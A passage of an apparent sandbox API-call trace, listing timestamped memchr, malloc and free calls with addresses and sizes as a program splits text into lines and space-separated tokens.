(_Block=0x0) [0135.508] memchr (_Buf=0x3def242, _Val=10, _MaxCount=0x68a) returned 0x3def27f [0135.508] malloc (_Size=0x3e) returned 0x3e22080 [0135.508] free (_Block=0x0) [0135.508] free (_Block=0x0) [0135.508] memchr (_Buf=0x3def280, _Val=10, _MaxCount=0x64c) returned 0x3def28e [0135.508] malloc (_Size=0xf) returned 0x3648920 [0135.508] free (_Block=0x0) [0135.508] free (_Block=0x0) [0135.508] memchr (_Buf=0x3def28f, _Val=10, _MaxCount=0x63d) returned 0x3def2b6 [0135.508] malloc (_Size=0x28) returned 0x60dd68 [0135.508] free (_Block=0x0) [0135.508] free (_Block=0x0) [0135.508] memchr (_Buf=0x3def2b7, _Val=10, _MaxCount=0x615) returned 0x3def31d [0135.508] malloc (_Size=0x67) returned 0x60b0e0 [0135.508] free (_Block=0x0) [0135.508] free (_Block=0x0) [0135.508] memchr (_Buf=0x3def31e, _Val=10, _MaxCount=0x5ae) returned 0x3def327 [0135.508] malloc (_Size=0xa) returned 0x3648680 [0135.508] free (_Block=0x0) [0135.508] free (_Block=0x0) [0135.508] memchr (_Buf=0x3def328, _Val=10, _MaxCount=0x5a4) returned 0x3def346 [0135.508] malloc (_Size=0x1f) returned 0x3d80350 [0135.508] free (_Block=0x0) [0135.508] free (_Block=0x0) [0135.508] memchr (_Buf=0x3def347, _Val=10, _MaxCount=0x585) returned 0x3def387 [0135.508] malloc (_Size=0x41) returned 0x3defbd0 [0135.509] free (_Block=0x0) [0135.509] free (_Block=0x0) [0135.509] memchr (_Buf=0x3def388, _Val=10, _MaxCount=0x544) returned 0x3def3c8 [0135.509] malloc (_Size=0x41) returned 0x3df0030 [0135.509] free (_Block=0x0) [0135.509] free (_Block=0x0) [0135.509] memchr (_Buf=0x3def3c9, _Val=10, _MaxCount=0x503) returned 0x3def405 [0135.509] malloc (_Size=0x3d) returned 0x3e220c8 [0135.509] free (_Block=0x0) [0135.509] free (_Block=0x0) [0135.509] memchr (_Buf=0x3def406, _Val=10, _MaxCount=0x4c6) returned 0x3def422 [0135.509] malloc (_Size=0x1d) returned 0x3d800a8 [0135.509] free (_Block=0x0) [0135.509] malloc (_Size=0x540) returned 0x3df00e0 [0135.509] free (_Block=0x3dd4128) [0135.509] free (_Block=0x0) [0135.509] memchr (_Buf=0x3def423, _Val=10, _MaxCount=0x4a9) returned 0x3def42e [0135.509] malloc (_Size=0xc) returned 0x3648e78 [0135.509] free (_Block=0x0) [0135.509] free (_Block=0x0) [0135.509] memchr (_Buf=0x3def42f, _Val=10, _MaxCount=0x49d) returned 0x3def44d [0135.509] malloc (_Size=0x1f) returned 0x3d80210 [0135.509] free (_Block=0x0) [0135.509] free (_Block=0x0) [0135.509] memchr (_Buf=0x3def44e, _Val=10, _MaxCount=0x47e) returned 0x3def48e [0135.509] malloc (_Size=0x41) returned 0x3defa90 [0135.509] free (_Block=0x0) [0135.509] free (_Block=0x0) [0135.510] memchr (_Buf=0x3def48f, _Val=10, _MaxCount=0x43d) returned 0x3def4cf [0135.510] malloc (_Size=0x41) returned 0x3defc70 [0135.510] free (_Block=0x0) [0135.510] free (_Block=0x0) [0135.510] memchr (_Buf=0x3def4d0, _Val=10, _MaxCount=0x3fc) returned 0x3def50c [0135.510] malloc (_Size=0x3d) returned 0x3e22788 [0135.510] free (_Block=0x0) [0135.510] free (_Block=0x0) [0135.510] memchr (_Buf=0x3def50d, _Val=10, _MaxCount=0x3bf) returned 0x3def529 [0135.510] malloc (_Size=0x1d) returned 0x3d80260 [0135.510] free (_Block=0x0) [0135.510] free (_Block=0x0) [0135.510] memchr (_Buf=0x3def52a, _Val=10, _MaxCount=0x3a2) returned 0x3def53d [0135.510] malloc (_Size=0x14) returned 0x3f65500 [0135.510] free (_Block=0x0) [0135.510] free (_Block=0x0) [0135.510] memchr (_Buf=0x3def53e, _Val=10, _MaxCount=0x38e) returned 0x3def557 [0135.510] malloc (_Size=0x1a) returned 0x3d802d8 [0135.510] free (_Block=0x0) [0135.510] free (_Block=0x0) [0135.510] memchr (_Buf=0x3def558, _Val=10, _MaxCount=0x374) returned 0x3def598 [0135.510] malloc (_Size=0x41) returned 0x3defae0 [0135.510] free (_Block=0x0) [0135.510] free (_Block=0x0) [0135.510] memchr (_Buf=0x3def599, _Val=10, _MaxCount=0x333) returned 0x3def5d9 [0135.510] malloc (_Size=0x41) returned 0x3defe00 [0135.510] free (_Block=0x0) [0135.511] free (_Block=0x0) [0135.511] memchr (_Buf=0x3def5da, _Val=10, _MaxCount=0x2f2) returned 0x3def606 [0135.511] malloc (_Size=0x2d) returned 0x3624bb8 [0135.511] free (_Block=0x0) [0135.511] free (_Block=0x0) [0135.511] memchr (_Buf=0x3def607, _Val=10, _MaxCount=0x2c5) returned 0x3def61e [0135.511] malloc (_Size=0x18) returned 0x3f65520 [0135.511] free (_Block=0x0) [0135.511] free (_Block=0x0) [0135.511] memchr (_Buf=0x3def61f, _Val=10, _MaxCount=0x2ad) returned 0x3def639 [0135.511] malloc (_Size=0x1b) returned 0x3d80198 [0135.511] free (_Block=0x0) [0135.511] free (_Block=0x0) [0135.511] memchr (_Buf=0x3def63a, _Val=10, _MaxCount=0x292) returned 0x3def656 [0135.511] malloc (_Size=0x1d) returned 0x3d80378 [0135.511] free (_Block=0x0) [0135.511] free (_Block=0x0) [0135.511] memchr (_Buf=0x3def657, _Val=10, _MaxCount=0x275) returned 0x3def697 [0135.511] malloc (_Size=0x41) returned 0x3defb30 [0135.511] free (_Block=0x0) [0135.511] free (_Block=0x0) [0135.511] memchr (_Buf=0x3def698, _Val=10, _MaxCount=0x234) returned 0x3def6d8 [0135.511] malloc (_Size=0x41) returned 0x3defb80 [0135.511] free (_Block=0x0) [0135.511] free (_Block=0x0) [0135.511] memchr (_Buf=0x3def6d9, _Val=10, _MaxCount=0x1f3) returned 0x3def6e5 [0135.511] malloc (_Size=0xd) returned 0x3648e00 [0135.512] free (_Block=0x0) [0135.512] free (_Block=0x0) [0135.512] memchr (_Buf=0x3def6e6, _Val=10, _MaxCount=0x1e6) returned 0x3def700 [0135.512] malloc (_Size=0x1b) returned 0x3d803a0 [0135.512] free (_Block=0x0) [0135.512] free (_Block=0x0) [0135.512] memchr (_Buf=0x3def701, _Val=10, _MaxCount=0x1cb) returned 0x3def713 [0135.512] malloc (_Size=0x13) returned 0x3f651e0 [0135.512] free (_Block=0x0) [0135.512] free (_Block=0x0) [0135.512] memchr (_Buf=0x3def714, _Val=10, _MaxCount=0x1b8) returned 0x3def74f [0135.512] malloc (_Size=0x3c) returned 0x3e22470 [0135.512] free (_Block=0x0) [0135.512] free (_Block=0x0) [0135.512] memchr (_Buf=0x3def750, _Val=10, _MaxCount=0x17c) returned 0x3def75a [0135.512] malloc (_Size=0xb) returned 0x3648d40 [0135.512] free (_Block=0x0) [0135.512] free (_Block=0x0) [0135.512] memchr (_Buf=0x3def75b, _Val=10, _MaxCount=0x171) returned 0x3def76f [0135.512] malloc (_Size=0x15) returned 0x3f65380 [0135.512] free (_Block=0x0) [0135.512] free (_Block=0x0) [0135.512] memchr (_Buf=0x3def770, _Val=10, _MaxCount=0x15c) returned 0x3def7d9 [0135.512] malloc (_Size=0x6a) returned 0x60bbf0 [0135.512] free (_Block=0x0) [0135.513] free (_Block=0x0) [0135.513] memchr (_Buf=0x3def7da, _Val=10, _MaxCount=0xf2) returned 0x3def7ea [0135.513] malloc (_Size=0x11) returned 0x3f653c0 [0135.513] free (_Block=0x0) [0135.513] free (_Block=0x0) [0135.513] memchr (_Buf=0x3def7eb, _Val=10, _MaxCount=0xe1) returned 0x3def804 [0135.513] malloc (_Size=0x1a) returned 0x3d803c8 [0135.513] free (_Block=0x0) [0135.513] free (_Block=0x0) [0135.513] memchr (_Buf=0x3def805, _Val=10, _MaxCount=0xc7) returned 0x3def845 [0135.513] malloc (_Size=0x41) returned 0x3def9f0 [0135.513] free (_Block=0x0) [0135.513] free (_Block=0x0) [0135.513] memchr (_Buf=0x3def846, _Val=10, _MaxCount=0x86) returned 0x3def886 [0135.513] malloc (_Size=0x41) returned 0x3defe50 [0135.513] free (_Block=0x0) [0135.513] free (_Block=0x0) [0135.513] memchr (_Buf=0x3def887, _Val=10, _MaxCount=0x45) returned 0x3def8b3 [0135.513] malloc (_Size=0x2d) returned 0x3624870 [0135.513] free (_Block=0x0) [0135.513] free (_Block=0x0) [0135.513] memchr (_Buf=0x3def8b4, _Val=10, _MaxCount=0x18) returned 0x3def8cb [0135.513] malloc (_Size=0x18) returned 0x3f653e0 [0135.513] free (_Block=0x0) [0135.513] free (_Block=0x0) [0135.513] free (_Block=0x3def010) [0135.513] memchr (_Buf=0x60dd38, _Val=32, _MaxCount=0x25) returned 0x60dd3e [0135.513] malloc (_Size=0x7) returned 0x3f4c028 [0135.514] free (_Block=0x0) [0135.514] malloc (_Size=0x40) returned 0x3e22308 [0135.514] free (_Block=0x0) [0135.514] free (_Block=0x0) [0135.514] memchr (_Buf=0x60dd3f, _Val=32, _MaxCount=0x1e) returned 0x60dd47 [0135.514] malloc (_Size=0x9) returned 0x3648ed8 [0135.514] free (_Block=0x0) [0135.514] free (_Block=0x0) [0135.514] memchr (_Buf=0x60dd48, _Val=32, _MaxCount=0x15) returned 0x60dd54 [0135.514] malloc (_Size=0xd) returned 0x3648db8 [0135.514] free (_Block=0x0) [0135.514] free (_Block=0x0) [0135.514] memchr (_Buf=0x60dd55, _Val=32, _MaxCount=0x8) returned 0x60dd58 [0135.514] malloc (_Size=0x4) returned 0x3f4c038 [0135.514] free (_Block=0x0) [0135.515] free (_Block=0x0) [0135.515] memchr (_Buf=0x60dd59, _Val=32, _MaxCount=0x4) returned 0x60dd5a [0135.515] malloc (_Size=0x2) returned 0x3f4c0b8 [0135.515] free (_Block=0x0) [0135.515] malloc (_Size=0x140) returned 0x3dd3d50 [0135.515] free (_Block=0x3e22308) [0135.515] free (_Block=0x0) [0135.515] memchr (_Buf=0x60dd5b, _Val=32, _MaxCount=0x2) returned 0x0 [0135.515] malloc (_Size=0x3) returned 0x3f4bfe8 [0135.515] free (_Block=0x0) [0135.515] free (_Block=0x0) [0135.515] free (_Block=0x3f4c028) [0135.515] free (_Block=0x3648ed8) [0135.515] free (_Block=0x3648db8) [0135.515] free (_Block=0x3f4c038) [0135.515] free (_Block=0x3f4c0b8) [0135.515] free (_Block=0x3f4bfe8) [0135.515] free (_Block=0x3dd3d50) [0135.515] memchr (_Buf=0x3f61360, _Val=32, _MaxCount=0x10) returned 0x0 [0135.515] malloc (_Size=0x11) returned 0x3f65280 [0135.515] free (_Block=0x0) [0135.515] malloc (_Size=0x40) returned 0x3e22158 [0135.515] free (_Block=0x0) [0135.515] free (_Block=0x0) [0135.515] free (_Block=0x3f65280) [0135.515] free (_Block=0x3e22158) [0135.515] memchr (_Buf=0x3d80238, _Val=32, _MaxCount=0x1c) returned 0x3d80242 [0135.515] malloc (_Size=0xb) returned 0x3648c80 [0135.516] free (_Block=0x0) [0135.516] malloc (_Size=0x40) returned 0x3e227d0 [0135.516] free (_Block=0x0) [0135.516] free (_Block=0x0) [0135.516] memchr (_Buf=0x3d80243, _Val=32, _MaxCount=0x11) returned 0x3d8024a [0135.516] malloc (_Size=0x8) returned 0x3f4c0c8 [0135.516] free (_Block=0x0) [0135.516] free (_Block=0x0) [0135.516] memchr (_Buf=0x3d8024b, _Val=32, _MaxCount=0x9) returned 0x0 [0135.516] malloc (_Size=0xa) returned 0x3648d70 [0135.516] free (_Block=0x0) [0135.516] free (_Block=0x0) [0135.516] free (_Block=0x3648c80) [0135.516] free (_Block=0x3f4c0c8) [0135.516] free (_Block=0x3648d70) [0135.516] free (_Block=0x3e227d0) [0135.516] memchr (_Buf=0x3defa40, _Val=32, _MaxCount=0x40) returned 0x0 [0135.516] malloc (_Size=0x41) returned 0x3deff90 [0135.516] free (_Block=0x0) [0135.516] malloc (_Size=0x40) returned 0x3e226b0 [0135.516] free (_Block=0x0) [0135.516] free (_Block=0x0) [0135.516] free (_Block=0x3deff90) [0135.516] free (_Block=0x3e226b0) [0135.516] memchr (_Buf=0x3df0080, _Val=32, _MaxCount=0x40) returned 0x0 [0135.516] malloc (_Size=0x41) returned 0x3defc20 [0135.516] free (_Block=0x0) [0135.517] malloc (_Size=0x40) returned 0x3e22590 [0135.517] free (_Block=0x0) [0135.517] free (_Block=0x0) [0135.517] free (_Block=0x3defc20) [0135.517] free (_Block=0x3e22590) [0135.517] memchr (_Buf=0x3e22428, _Val=32, _MaxCount=0x3c) returned 0x0 [0135.517] malloc (_Size=0x3d) returned 0x3e22230 [0135.517] free (_Block=0x0) [0135.517] malloc (_Size=0x40) returned 0x3e22278 [0135.517] free (_Block=0x0) [0135.517] free (_Block=0x0) [0135.517] free (_Block=0x3e22230) [0135.517] free (_Block=0x3e22278) [0135.517] memchr (_Buf=0x3d800d0, _Val=32, _MaxCount=0x1a) returned 0x3d800d8 [0135.517] malloc (_Size=0x9) returned 0x3648c50 [0135.517] free (_Block=0x0) [0135.517] malloc (_Size=0x40) returned 0x3e22350 [0135.517] free (_Block=0x0) [0135.517] free (_Block=0x0) [0135.517] memchr (_Buf=0x3d800d9, _Val=32, _MaxCount=0x11) returned 0x3d800e0 [0135.517] malloc (_Size=0x8) returned 0x3f4bf18 [0135.517] free (_Block=0x0) [0135.517] free (_Block=0x0) [0135.517] memchr (_Buf=0x3d800e1, _Val=32, _MaxCount=0x9) returned 0x0 [0135.517] malloc (_Size=0xa) returned 0x3648cb0 [0135.517] free (_Block=0x0) [0135.517] free (_Block=0x0) [0135.517] free (_Block=0x3648c50) [0135.517] free (_Block=0x3f4bf18) [0135.517] free (_Block=0x3648cb0) [0135.518] free (_Block=0x3e22350) [0135.518] memchr (_Buf=0x3e223e0, _Val=32, _MaxCount=0x3e) returned 0x3e223f2 [0135.518] malloc (_Size=0x13) returned 0x3f65300 [0135.518] free (_Block=0x0) [0135.518] malloc (_Size=0x40) returned 0x3e22548 [0135.518] free (_Block=0x0) [0135.518] free (_Block=0x0) [0135.518] memchr (_Buf=0x3e223f3, _Val=32, _MaxCount=0x2b) returned 0x0 [0135.518] malloc (_Size=0x2c) returned 0x3624950 [0135.518] free (_Block=0x0) [0135.518] free (_Block=0x0) [0135.518] free (_Block=0x3f65300) [0135.518] free (_Block=0x3624950) [0135.518] free (_Block=0x3e22548) [0135.518] memchr (_Buf=0x3d801e8, _Val=32, _MaxCount=0x1d) returned 0x3d801f0 [0135.518] malloc (_Size=0x9) returned 0x3648f20 [0135.518] free (_Block=0x0) [0135.518] malloc (_Size=0x40) returned 0x3e224b8 [0135.518] free (_Block=0x0) [0135.518] free (_Block=0x0) [0135.518] memchr (_Buf=0x3d801f1, _Val=32, _MaxCount=0x14) returned 0x3d801f4 [0135.518] malloc (_Size=0x4) returned 0x3f4c0c8 [0135.518] free (_Block=0x0) [0135.518] free (_Block=0x0) [0135.518] memchr (_Buf=0x3d801f5, _Val=32, _MaxCount=0x10) returned 0x3d801fc [0135.518] malloc (_Size=0x8) returned 0x3f4bf18 [0135.518] free (_Block=0x0) [0135.518] free (_Block=0x0) [0135.518] memchr (_Buf=0x3d801fd, _Val=32, _MaxCount=0x8) returned 0x3d801ff [0135.519] malloc (_Size=0x3) returned 0x3f4bf98 [0135.519] free (_Block=0x0) [0135.519] free (_Block=0x0) [0135.519] memchr (_Buf=0x3d80200, _Val=32, _MaxCount=0x5) returned 0x0 [0135.519] malloc (_Size=0x6) returned 0x3f4bf38 [0135.519] free (_Block=0x0) [0135.519] malloc (_Size=0x140) returned 0x3dd4128 [0135.519] free (_Block=0x3e224b8) [0135.519] free (_Block=0x0) [0135.519] free (_Block=0x3648f20) [0135.519] free (_Block=0x3f4c0c8) [0135.519] free (_Block=0x3f4bf18) [0135.519] free (_Block=0x3f4bf98) [0135.519] free (_Block=0x3f4bf38) [0135.519] free (_Block=0x3dd4128) [0135.519] memchr (_Buf=0x3d80460, _Val=32, _MaxCount=0x88) returned 0x3d80465 [0135.519] malloc (_Size=0x6) returned 0x3f4c0e8 [0135.519] free (_Block=0x0) [0135.519] malloc (_Size=0x40) returned 0x3e22038 [0135.519] free (_Block=0x0) [0135.519] free (_Block=0x0) [0135.519] memchr (_Buf=0x3d80466, _Val=32, _MaxCount=0x82) returned 0x3d8046e [0135.519] malloc (_Size=0x9) returned 0x3648d88 [0135.519] free (_Block=0x0) [0135.519] free (_Block=0x0) [0135.519] memchr (_Buf=0x3d8046f, _Val=32, _MaxCount=0x79) returned 0x3d80477 [0135.519] malloc (_Size=0x9) returned 0x3648f20 [0135.519] free (_Block=0x0) [0135.519] free (_Block=0x0) [0135.520] memchr (_Buf=0x3d80478, _Val=32, _MaxCount=0x70) returned 0x3d80484 [0135.520] malloc (_Size=0xd) returned 0x3648ef0 [0135.520] free (_Block=0x0) [0135.520] free (_Block=0x0) [0135.520] memchr (_Buf=0x3d80485, _Val=32, _MaxCount=0x63) returned 0x3d8048f [0135.520] malloc (_Size=0xb) returned 0x3648db8 [0135.520] free (_Block=0x0) [0135.520] malloc (_Size=0x140) returned 0x3dd48d8 [0135.520] free (_Block=0x3e22038) [0135.520] free (_Block=0x0) [0135.520] memchr (_Buf=0x3d80490, _Val=32, _MaxCount=0x58) returned 0x3d80499 [0135.520] malloc (_Size=0xa) returned 0x3648d10 [0135.520] free (_Block=0x0) [0135.520] free (_Block=0x0) [0135.520] memchr (_Buf=0x3d8049a, _Val=32, _MaxCount=0x4e) returned 0x3d804a5 [0135.520] malloc (_Size=0xc) returned 0x3648ce0 [0135.520] free (_Block=0x0) [0135.520] free (_Block=0x0) [0135.520] memchr (_Buf=0x3d804a6, _Val=32, _MaxCount=0x42) returned 0x3d804b0 [0135.520] malloc (_Size=0xb) returned 0x3648e90 [0135.520] free (_Block=0x0) [0135.520] free (_Block=0x0) [0135.520] memchr (_Buf=0x3d804b1, _Val=32, _MaxCount=0x37) returned 0x3d804b9 [0135.520] malloc (_Size=0x9) returned 0x3648de8 [0135.520] free (_Block=0x0) [0135.520] free (_Block=0x0) [0135.520] memchr (_Buf=0x3d804ba, _Val=32, _MaxCount=0x2e) returned 0x3d804c6 [0135.521] malloc (_Size=0xd) returned 0x3648cf8 [0135.521] free (_Block=0x0) [0135.521] free (_Block=0x0) [0135.521] memchr (_Buf=0x3d804c7, _Val=32, _MaxCount=0x21) returned 0x3d804d4 [0135.521] malloc (_Size=0xe) returned 0x3648c50 [0135.521] free (_Block=0x0) [0135.521] free (_Block=0x0) [0135.521] memchr (_Buf=0x3d804d5, _Val=32, _MaxCount=0x13) returned 0x3d804de [0135.521] malloc (_Size=0xa) returned 0x3648e18 [0135.521] free (_Block=0x0) [0135.521] free (_Block=0x0) [0135.521] memchr (_Buf=0x3d804df, _Val=32, _MaxCount=0x9) returned 0x0 [0135.521] malloc (_Size=0xa) returned 0x3648f38 [0135.521] free (_Block=0x0) [0135.521] free (_Block=0x0) [0135.521] free (_Block=0x3f4c0e8) [0135.521] free (_Block=0x3648d88) [0135.521] free (_Block=0x3648f20) [0135.521] free (_Block=0x3648ef0) [0135.521] free (_Block=0x3648db8) [0135.521] free (_Block=0x3648d10) [0135.521] free (_Block=0x3648ce0) [0135.521] free (_Block=0x3648e90) [0135.521] free (_Block=0x3648de8) [0135.521] free (_Block=0x3648cf8) [0135.521] free (_Block=0x3648c50) [0135.521] free (_Block=0x3648e18) [0135.521] free (_Block=0x3648f38) [0135.522] free (_Block=0x3dd48d8) [0135.522] memchr (_Buf=0x3d80328, _Val=32, _MaxCount=0x1d) returned 0x3d80331 [0135.522] malloc (_Size=0xa) returned 0x3648f08 [0135.522] free (_Block=0x0) [0135.522] malloc (_Size=0x40) returned 0x3e22590 [0135.522] free (_Block=0x0) [0135.522] free (_Block=0x0) [0135.522] memchr (_Buf=0x3d80332, _Val=32, _MaxCount=0x13) returned 0x3d8033c [0135.522] malloc (_Size=0xb) returned 0x3648e18 [0135.522] free (_Block=0x0) [0135.522] free (_Block=0x0) [0135.522] memchr (_Buf=0x3d8033d, _Val=32, _MaxCount=0x8) returned 0x0 [0135.522] malloc (_Size=0x9) returned 0x3648d58 [0135.522] free (_Block=0x0) [0135.522] free (_Block=0x0) [0135.522] free (_Block=0x3648f08) [0135.522] free (_Block=0x3648e18) [0135.522] free (_Block=0x3648d58) [0135.522] free (_Block=0x3e22590) [0135.522] memchr (_Buf=0x3e22080, _Val=32, _MaxCount=0x3d) returned 0x3e2208b [0135.522] malloc (_Size=0xc) returned 0x3648f08 [0135.522] free (_Block=0x0) [0135.522] malloc (_Size=0x40) returned 0x3e224b8 [0135.522] free (_Block=0x0) [0135.522] free (_Block=0x0) [0135.522] memchr (_Buf=0x3e2208c, _Val=32, _MaxCount=0x31) returned 0x3e22090 [0135.522] malloc (_Size=0x5) returned 0x3f4bf88 [0135.522] free (_Block=0x0) [0135.522] free (_Block=0x0) [0135.523] memchr (_Buf=0x3e22091, _Val=32, _MaxCount=0x2c) returned 0x3e22095 [0135.523] malloc (_Size=0x5) returned 0x3f4c0c8 [0135.523] free (_Block=0x0) [0135.523] free (_Block=0x0) [0135.523] memchr (_Buf=0x3e22096, _Val=32, _MaxCount=0x27) returned 0x3e2209a [0135.523] malloc (_Size=0x5) returned 0x3f4bfe8 [0135.523] free (_Block=0x0) [0135.523] free (_Block=0x0) [0135.523] memchr (_Buf=0x3e2209b, _Val=32, _MaxCount=0x22) returned 0x3e2209f [0135.523] malloc (_Size=0x5) returned 0x3f4c038 [0135.523] free (_Block=0x0) [0135.523] malloc (_Size=0x140) returned 0x3dd4790 [0135.523] free (_Block=0x3e224b8) [0135.523] free (_Block=0x0) [0135.523] memchr (_Buf=0x3e220a0, _Val=32, _MaxCount=0x1d) returned 0x3e220a4 [0135.523] malloc (_Size=0x5) returned 0x3f4bfb8 [0135.523] free (_Block=0x0) [0135.523] free (_Block=0x0) [0135.523] memchr (_Buf=0x3e220a5, _Val=32, _MaxCount=0x18) returned 0x3e220a9 [0135.523] malloc (_Size=0x5) returned 0x3f4c098 [0135.523] free (_Block=0x0) [0135.523] free (_Block=0x0) [0135.523] memchr (_Buf=0x3e220aa, _Val=32, _MaxCount=0x13) returned 0x3e220ae [0135.523] malloc (_Size=0x5) returned 0x3f4bf78 [0135.523] free (_Block=0x0) [0135.523] free (_Block=0x0) [0135.523] memchr (_Buf=0x3e220af, _Val=32, _MaxCount=0xe) returned 0x3e220b3 [0135.523] malloc (_Size=0x5) returned 0x3f4c048 [0135.524] free (_Block=0x0) [0135.524] free (_Block=0x0) [0135.524] memchr (_Buf=0x3e220b4, _Val=32, _MaxCount=0x9) returned 0x3e220b8 [0135.524] malloc (_Size=0x5) returned 0x3f4bfc8 [0135.524] free (_Block=0x0) [0135.524] free (_Block=0x0) [0135.524] memchr (_Buf=0x3e220b9, _Val=32, _MaxCount=0x4) returned 0x0 [0135.524] malloc (_Size=0x5) returned 0x3f4bf98 [0135.524] free (_Block=0x0) [0135.524] free (_Block=0x0) [0135.524] free (_Block=0x3648f08) [0135.524] free (_Block=0x3f4bf88) [0135.524] free (_Block=0x3f4c0c8) [0135.524] free (_Block=0x3f4bfe8) [0135.524] free (_Block=0x3f4c038) [0135.524] free (_Block=0x3f4bfb8) [0135.524] free (_Block=0x3f4c098) [0135.524] free (_Block=0x3f4bf78) [0135.524] free (_Block=0x3f4c048) [0135.524] free (_Block=0x3f4bfc8) [0135.524] free (_Block=0x3f4bf98) [0135.524] free (_Block=0x3dd4790) [0135.524] memchr (_Buf=0x3648920, _Val=32, _MaxCount=0xe) returned 0x3648926 [0135.524] malloc (_Size=0x7) returned 0x3f4bf28 [0135.524] free (_Block=0x0) [0135.524] malloc (_Size=0x40) returned 0x3e22620 [0135.524] free (_Block=0x0) [0135.524] free (_Block=0x0) [0135.525] memchr (_Buf=0x3648927, _Val=32, _MaxCount=0x7) returned 0x0 [0135.525] malloc (_Size=0x8) returned 0x3f4c0f8 [0135.525] free (_Block=0x0) [0135.525] free (_Block=0x0) [0135.525] free (_Block=0x3f4bf28) [0135.525] free (_Block=0x3f4c0f8) [0135.525] free (_Block=0x3e22620) [0135.525] memchr (_Buf=0x60dd68, _Val=32, _MaxCount=0x27) returned 0x60dd71 [0135.525] malloc (_Size=0xa) returned 0x3648e60 [0135.525] free (_Block=0x0) [0135.525] malloc (_Size=0x40) returned 0x3e22308 [0135.525] free (_Block=0x0) [0135.525] free (_Block=0x0) [0135.525] memchr (_Buf=0x60dd72, _Val=32, _MaxCount=0x1d) returned 0x60dd7c [0135.525] malloc (_Size=0xb) returned 0x3648ef0 [0135.525] free (_Block=0x0) [0135.525] free (_Block=0x0) [0135.525] memchr (_Buf=0x60dd7d, _Val=32, _MaxCount=0x12) returned 0x60dd87 [0135.525] malloc (_Size=0xb) returned 0x3648e90 [0135.525] free (_Block=0x0) [0135.525] free (_Block=0x0) [0135.525] memchr (_Buf=0x60dd88, _Val=32, _MaxCount=0x7) returned 0x0 [0135.525] malloc (_Size=0x8) returned 0x3f4bfd8 [0135.525] free (_Block=0x0) [0135.525] free (_Block=0x0) [0135.525] free (_Block=0x3648e60) [0135.525] free (_Block=0x3648ef0) [0135.526] free (_Block=0x3648e90) [0135.526] free (_Block=0x3f4bfd8) [0135.526] free (_Block=0x3e22308) [0135.526] memchr (_Buf=0x60b0e0, _Val=32, _MaxCount=0x66) returned 0x60b0f1 [0135.526] malloc (_Size=0x12) returned 0x3f65480 [0135.526] free (_Block=0x0) [0135.526] malloc (_Size=0x40) returned 0x3e224b8 [0135.526] free (_Block=0x0) [0135.526] free (_Block=0x0) [0135.526] memchr (_Buf=0x60b0f2, _Val=32, _MaxCount=0x54) returned 0x60b11a [0135.526] malloc (_Size=0x29) returned 0x36248e0 [0135.526] free (_Block=0x0) [0135.526] free (_Block=0x0) [0135.526] memchr (_Buf=0x60b11b, _Val=32, _MaxCount=0x2b) returned 0x0 [0135.526] malloc (_Size=0x2c) returned 0x3624b48 [0135.526] free (_Block=0x0) [0135.526] free (_Block=0x0) [0135.526] free (_Block=0x3f65480) [0135.526] free (_Block=0x36248e0) [0135.526] free (_Block=0x3624b48) [0135.526] free (_Block=0x3e224b8) [0135.526] memchr (_Buf=0x3648680, _Val=32, _MaxCount=0x9) returned 0x0 [0135.526] malloc (_Size=0xa) returned 0x3648cf8 [0135.526] free (_Block=0x0) [0135.526] malloc (_Size=0x40) returned 0x3e221a0 [0135.526] free (_Block=0x0) [0135.526] free (_Block=0x0) [0135.526] free (_Block=0x3648cf8) [0135.526] free (_Block=0x3e221a0) [0135.527] memchr (_Buf=0x3d80350, _Val=32, _MaxCount=0x1e) returned 0x3d8035a [0135.527] malloc (_Size=0xb) returned 0x3648e18 [0135.527] free (_Block=0x0) [0135.527] malloc (_Size=0x40) returned 0x3e22110 [0135.527] free (_Block=0x0) [0135.527] free (_Block=0x0) [0135.527] memchr (_Buf=0x3d8035b, _Val=32, _MaxCount=0x13) returned 0x3d8035e [0135.527] malloc (_Size=0x4) returned 0x3f4bfb8 [0135.527] free (_Block=0x0) [0135.527] free (_Block=0x0) [0135.527] memchr (_Buf=0x3d8035f, _Val=32, _MaxCount=0xf) returned 0x3d80365 [0135.527] malloc (_Size=0x7) returned 0x3f4bf48 [0135.527] free (_Block=0x0) [0135.527] free (_Block=0x0) [0135.527] memchr (_Buf=0x3d80366, _Val=32, _MaxCount=0x8) returned 0x0 [0135.527] malloc (_Size=0x9) returned 0x3648db8 [0135.527] free (_Block=0x0) [0135.527] free (_Block=0x0) [0135.527] free (_Block=0x3648e18) [0135.527] free (_Block=0x3f4bfb8) [0135.527] free (_Block=0x3f4bf48) [0135.527] free (_Block=0x3648db8) [0135.527] free (_Block=0x3e22110) [0135.527] memchr (_Buf=0x3defbd0, _Val=32, _MaxCount=0x40) returned 0x0 [0135.527] malloc (_Size=0x41) returned 0x3defc20 [0135.527] free (_Block=0x0) [0135.527] malloc (_Size=0x40) returned 0x3e227d0 [0135.527] free (_Block=0x0) [0135.528] free (_Block=0x0) [0135.528] malloc (_Size=0x41) returned 0x3defea0 [0135.528] free (_Block=0x0) [0135.528] free (_Block=0x3defc20) [0135.528] free (_Block=0x3e227d0) [0135.528] memchr (_Buf=0x3df0030, _Val=32, _MaxCount=0x40) returned 0x0 [0135.528] malloc (_Size=0x41) returned 0x3defc20 [0135.528] free (_Block=0x0) [0135.528] malloc (_Size=0x40) returned 0x3e224b8 [0135.528] free (_Block=0x0) [0135.528] free (_Block=0x0) [0135.528] malloc (_Size=0x81) returned 0x60bde0 [0135.528] free (_Block=0x3defea0) [0135.528] free (_Block=0x3defc20) [0135.528] free (_Block=0x3e224b8) [0135.528] memchr (_Buf=0x3e220c8, _Val=32, _MaxCount=0x3c) returned 0x0 [0135.528] malloc (_Size=0x3d) returned 0x3e22278 [0135.528] free (_Block=0x0) [0135.528] malloc (_Size=0x40) returned 0x3e22110 [0135.528] free (_Block=0x0) [0135.528] free (_Block=0x0) [0135.528] malloc (_Size=0xc1) returned 0x605a18 [0135.528] free (_Block=0x60bde0) [0135.528] free (_Block=0x3e22278) [0135.529] free (_Block=0x3e22110) [0135.529] memchr (_Buf=0x3d800a8, _Val=32, _MaxCount=0x1c) returned 0x3d800b0 [0135.529] malloc (_Size=0x9) returned 0x3648c98 [0135.529] free (_Block=0x0) [0135.529] malloc (_Size=0x40) returned 0x3e22278 [0135.529] free (_Block=0x0) [0135.529] free (_Block=0x0) [0135.529] memchr (_Buf=0x3d800b1, _Val=32, _MaxCount=0x13) returned 0x3d800b4 [0135.529] malloc (_Size=0x4) returned 0x3f4c098 [0135.529] free (_Block=0x0) [0135.529] free (_Block=0x0) [0135.529] memchr (_Buf=0x3d800b5, _Val=32, _MaxCount=0xf) returned 